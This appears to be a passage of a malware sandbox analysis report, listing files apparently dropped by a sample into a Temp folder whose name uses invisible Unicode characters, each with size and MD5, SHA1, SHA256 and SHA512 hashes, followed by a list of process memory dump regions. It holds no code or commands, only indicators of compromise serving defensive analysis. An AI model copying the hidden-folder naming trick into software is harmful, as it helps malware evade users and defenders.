Download Submit
C:\Users\Admin\AppData\Local\Temp\‎ ‏‍ ‌‏ \Common Files\Documents\ConnectAssert.xlsx

Filesize
11KB

MD5
5bb8be1d26c45a2df1b1856312b7a9cc

SHA1
91302e90ffdb1c012905f1ec2c6d3af6553c8999

SHA256
1a8feded2d247e3abe28b8cda0413d1197035c295e7295ee853dc18690068bbf

SHA512
b0fbf2e71a968f6e4cf09470eab3743de3226bf9540125af8e9eb13fa2dad8b75d80dd0cfce6f17467143225fda603cc578b60c5f64499dd6ba12d43a9e3d345

Download Submit
C:\Users\Admin\AppData\Local\Temp\‎ ‏‍ ‌‏ \Common Files\Documents\HideDeny.xlsx

Filesize
9KB

MD5
725b67ac3892b92b07ce27583919fe6f

SHA1
33c2c929169c317b848d752e072d8faef6243c9f

SHA256
1c75b4d7566989c0fc8d8219250d8508eb97cc1837097a550c99f3102f7608dd

SHA512
3901b61794e2aec3147ff370ce8d6638a52deddb82b29843b6b55bca986c9d11a554c82a284db5232ab6c03fbbadba803a994a8267ddc771b5c0720498315c02

Download Submit
C:\Users\Admin\AppData\Local\Temp\‎ ‏‍ ‌‏ \Common Files\Documents\TraceJoin.xlsx

Filesize
10KB

MD5
65cb3b90c3685c03e53978bfc7e451b5

SHA1
4041f1b6a5f49342fc4d947b3a34fa77eb479c09

SHA256
776a8d0efc30ef0fd7a513f1cdc438239f90decd48e03f5f12c531c96d6c97bb

SHA512
7f8442d2420470b24e3f5486899fbb7555f8989347b3fe806f916482ba4653b54e44fc6b892a328749fa4db899df5e534db76c4c83dc448cab405b0e4e9872ba

Download Submit
C:\Users\Admin\AppData\Local\Temp\‎ ‏‍ ‌‏ \Common Files\Downloads\BackupSet.php

Filesize
501KB

MD5
a516639f775f0771a36e0e4567528604

SHA1
94616366c0b3178814f23565738d3596af9703f6

SHA256
5bb8f4b702e4cf33f337d0aaec6b1e99582418a9830f191874f4c1911330c95d

SHA512
7e5157d23df4c3729ca4cd38dbbad3b78c3843e05213e2d2efa2772cab1486bcdf6f7c39fc282af0abb75fe68971235d38ea417886f12eaa83a19e4557284cd9

Download Submit
C:\Users\Admin\AppData\Local\Temp\‎ ‏‍ ‌‏ \Common Files\Downloads\BlockTest.csv

Filesize
1.6MB

MD5
ad400d572faf7bd65d0b67edfa3b3d2a

SHA1
11ef6d571dcbf738bb62d0237273cd3f73680bc5

SHA256
2ae785d3314a798fdb23abb7a29ca2492aa0fee15e4505e829ed702215600c6d

SHA512
16653b64bd48acafa0461d821b2f5d72ba687e7480bdb6ed22abbe39b07a16b5939483dfb8ba37533be31b6673dcae8999cf98d03901b52673c360cb05ecbf54

Download Submit
C:\Users\Admin\AppData\Local\Temp\‎ ‏‍ ‌‏ \Common Files\Downloads\ClearGet.docx

Filesize
672KB

MD5
4c5d8abb5450e90f7c504d372f2ec251

SHA1
4152c79d38e35a88f8507677f8d9531011c59f4a

SHA256
70fc9cdd5fe000f5c0bbdec2bd8b3da8c1aac6ad5f871cdbe96610e309961545

SHA512
9ee1993a43f368ec9344b4d77a703874eff35476989eb407345f015bebed1657f30e3466d670b2380cb3509a9718a9f7896d9fdd00a3cd786a23750102521c54

Download Submit
C:\Users\Admin\AppData\Local\Temp\‎ ‏‍ ‌‏ \Common Files\Downloads\UnpublishComplete.png

Filesize
965KB

MD5
23c749ebad20e320218c319b62d151c4

SHA1
030a6245cb8bf0fdc46d38884e99ea20d91d21c1

SHA256
ae12c910828027ac4eb5644a753e3e279539923ff08ecee0a56013858eb50f02

SHA512
13800931ed935854e1bb5ea829a40fe3aa5903cd60dfceabb39e5b7a581090fb2828b03ffce0599f897beea85ac15429642b3d3bab719ba2962e2ff0b64e3fb0

Download Submit
C:\Users\Admin\AppData\Local\Temp\‎ ‏‍ ‌‏ \Common Files\Music\GroupGrant.xls

Filesize
301KB

MD5
12c37c4e46685362dd75f90a2ca886f4

SHA1
4cb6c692d2452a8052c1ac2339ba1ffa752d5614

SHA256
3853097bc7abcc37ff01bbdce63c2a92b1db1f95f401d80a327de322237e7c8d

SHA512
486fcffcc5b8eadcf359ea567dc591a6f145994a3e640e1af938602066022b2a12c2ffae586a428a360e01325442bc68bf6df36046734ed0d8ccf009c0c7f157

Download Submit
C:\Users\Admin\AppData\Local\Temp\‎ ‏‍ ‌‏ \Common Files\Music\StepAdd.txt

Filesize
485KB

MD5
318579642042f83601483bda7724537c

SHA1
00abe1554c2811a7086f44ddfa0895fc2a2742b5

SHA256
241e77aae20f9f3728ca74d354d00b2508b8410658b0cdc8fc1b2e417cff827b

SHA512
2145924e99f0d1621bc68d0666e12e4a6ff497e70a34e93784a14487a1a7cf47d171ab885b2fcbac52f5226968c5fae8a585d8afed74722432f373e5f97d8742

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\doqh4qse\CSC3904739BF95C4477805B53943BB450F3.TMP

Filesize
652B

MD5
6225df08b29a22607b46f39b6cdee76f

SHA1
b253f8710551378f4cdb57757c1f7fe4e85ab100

SHA256
88dab02140360d06074167041ad1c341eece1ab0c00f9d4995d851a19d56e6b5

SHA512
8975370611329ab66ec8d9c755082c28bcfae2184077e9899e2de076c01d3d7bce04bc102644b6a2210748665051ea4b308bebec3198289a7b2e515ea015d26d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\doqh4qse\doqh4qse.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\doqh4qse\doqh4qse.cmdline

Filesize
607B

MD5
406a70a6ef8642674a6f78bfc08156e8

SHA1
c3203c4a73c146ddaeb5eec6baddbee481a14627

SHA256
b63faf1d770cabe39e466ee5e9996d010d2db24cb4584297f885e513e43354e9

SHA512
efd91df476298bcc75379c4cddd1269a24b4a072f317a8fd4e95032596ba47958e9c63bb49f1790cee713c9a6ad57ecdded988bd39738c66ce973b15e78215ee

Download Submit
memory/1828-181-0x00000227C7930000-0x00000227C7938000-memory.dmp

Filesize
32KB

Download
memory/2160-85-0x000001E9118C0000-0x000001E9118E2000-memory.dmp

Filesize
136KB

Download
memory/4848-62-0x00007FFC6B630000-0x00007FFC6B654000-memory.dmp

Filesize
144KB

Download
memory/4848-79-0x00007FFC67D80000-0x00007FFC67E9B000-memory.dmp

Filesize
1.1MB

Download
memory/4848-60-0x00007FFC6D9C0000-0x00007FFC6D9D9000-memory.dmp

Filesize
100KB

Download
memory/4848-56-0x00007FFC6DAE0000-0x00007FFC6DAF5000-memory.dmp

Filesize
84KB

Download
memory/4848-54-0x00007FFC6B660000-0x00007FFC6B68D000-memory.dmp

Filesize
180KB

Download
memory/4848-239-0x00007FFC6B630000-0x00007FFC6B654000-memory.dmp

Filesize
144KB

Download
memory/4848-241-0x00007FFC68640000-0x00007FFC687B7000-memory.dmp

Filesize
1.5MB

Download
memory/4848-30-0x00007FFC6B690000-0x00007FFC6B6B5000-memory.dmp

Filesize
148KB

Download
memory/4848-32-0x00007FFC716E0000-0x00007FFC716EF000-memory.dmp

Filesize
60KB

Download
memory/4848-25-0x00007FFC56BD0000-0x00007FFC572A0000-memory.dmp

Filesize
6.8MB

Download
memory/4848-104-0x00007FFC566A0000-0x00007FFC56BC2000-memory.dmp

Filesize
5.1MB

Download
memory/4848-103-0x00007FFC6DAE0000-0x00007FFC6DAF5000-memory.dmp

Filesize
84KB

Download
memory/4848-70-0x00007FFC56BD0000-0x00007FFC572A0000-memory.dmp

Filesize
6.8MB

Download
memory/4848-64-0x00007FFC68640000-0x00007FFC687B7000-memory.dmp

Filesize
1.5MB

Download
memory/4848-66-0x00007FFC6C700000-0x00007FFC6C719000-memory.dmp

Filesize
100KB

Download
memory/4848-58-0x00007FFC566A0000-0x00007FFC56BC2000-memory.dmp

Filesize
5.1MB

Download
memory/4848-78-0x00007FFC6B660000-0x00007FFC6B68D000-memory.dmp

Filesize
180KB

Download
memory/4848-76-0x00007FFC6C980000-0x00007FFC6C98D000-memory.dmp

Filesize
52KB

Download
memory/4848-71-0x00007FFC716D0000-0x00007FFC716DD000-memory.dmp

Filesize
52KB

Download
memory/4848-257-0x00007FFC6C700000-0x00007FFC6C719000-memory.dmp

Filesize
100KB

Download
memory/4848-72-0x00007FFC67EA0000-0x00007FFC67F6D000-memory.dmp

Filesize
820KB

Download
memory/4848-73-0x00007FFC68600000-0x00007FFC68633000-memory.dmp

Filesize
204KB

Download
memory/4848-74-0x00007FFC6B690000-0x00007FFC6B6B5000-memory.dmp

Filesize
148KB

Download
memory/4848-262-0x00007FFC67EA0000-0x00007FFC67F6D000-memory.dmp

Filesize
820KB

Download
memory/4848-281-0x00007FFC68600000-0x00007FFC68633000-memory.dmp

Filesize
204KB

Download
memory/4848-282-0x00007FFC56BD0000-0x00007FFC572A0000-memory.dmp

Filesize
6.8MB

Download
memory/4848-296-0x00007FFC67D80000-0x00007FFC67E9B000-memory.dmp

Filesize
1.1MB

Download
memory/4848-287-0x00007FFC566A0000-0x00007FFC56BC2000-memory.dmp

Filesize
5.1MB

Download
memory/4848-283-0x00007FFC6B690000-0x00007FFC6B6B5000-memory.dmp

Filesize
148KB

Download